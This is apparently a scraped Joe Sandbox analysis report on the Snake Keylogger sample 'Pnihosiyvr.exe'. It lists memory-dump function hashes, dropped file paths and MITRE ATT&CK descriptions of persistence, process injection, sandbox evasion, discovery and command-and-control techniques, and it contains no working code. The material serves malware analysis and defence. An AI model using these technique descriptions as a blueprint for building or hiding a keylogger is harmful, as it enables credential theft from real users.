Uniqueness Score: -1.00%

Function 00007FF848F20C39 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3237420474.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff848f20000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0ef8935d7dc1618195d1f8e54b788ca52d2eb36b2a8a3060346454ef96e5419
Instruction ID: acc42d12a0d8d39ad4ceee3121f54fa2aac036aa9a5bb262248dc8afe222bba0
Opcode Fuzzy Hash: c0ef8935d7dc1618195d1f8e54b788ca52d2eb36b2a8a3060346454ef96e5419
Instruction Fuzzy Hash: 94D09E77D4C80D4EE684F758B4555FC6BB1EBC8660F551035C409E21D5CE1518828664

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F20F8F Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3237420474.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff848f20000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35fff7ac0f834f12aefa5e491df4883af7dfbcc81b732fcc69def6d5c24b8b21
Instruction ID: 1cb2071ea15574d0e9a0d51debf69eb274b6bf3655eb8f338a1fd8b286f2ea33
Opcode Fuzzy Hash: 35fff7ac0f834f12aefa5e491df4883af7dfbcc81b732fcc69def6d5c24b8b21
Instruction Fuzzy Hash: D1E0EC70509B5D9FDB91EB68C85DB99BBF6EF19210F1040D9804ED7121DB355D85CF01

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF848F2045D Relevance: 6.5, Strings: 5, Instructions: 227COMMON

Download Yara Rule

Strings

peH, xrefs: 00007FF848F204D1
HbH, xrefs: 00007FF848F204A1
dH, xrefs: 00007FF848F204B1
(eH, xrefs: 00007FF848F204C1
HfH, xrefs: 00007FF848F20501

Memory Dump Source

Source File: 0000000D.00000002.3237420474.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff848f20000_MSBuild.jbxd

Similarity

API ID:
String ID: (eH$HbH$HfH$peH$dH
API String ID: 0-3493289530
Opcode ID: e094a94ebfd10fb3caad303b0b3095b7db17e761139a6187c79e9b8db3a8a1c3
Instruction ID: 092a962e557ae27df1f98ded6c1456e190a3cb277d3d68fe7bb324dd9dfb8e3d
Opcode Fuzzy Hash: e094a94ebfd10fb3caad303b0b3095b7db17e761139a6187c79e9b8db3a8a1c3
Instruction Fuzzy Hash: EA51C313E0F5D29FE25573BC78151F96F90EF826A8B0C42BBD08C4B0DB991D5C1A839A

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Pnihosiyvr.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_MSBuild.exe_6f7dcd1940ace3d3d06544b01a852bbab5b6d4_9e133ab6_1cc90496-baf4-4257-a69f-6b76b5dbc299\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2BA4.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D4B.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D7B.tmp.xml

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MSBuild.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Pnihosiyvr.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\sssssssssssssssss.exe.log

C:\Users\user\AppData\Roaming\sssssssssssssssss.exe

C:\Users\user\AppData\Roaming\sssssssssssssssss.exe:Zone.Identifier

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

Windows Analysis Report
Pnihosiyvr.exe

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre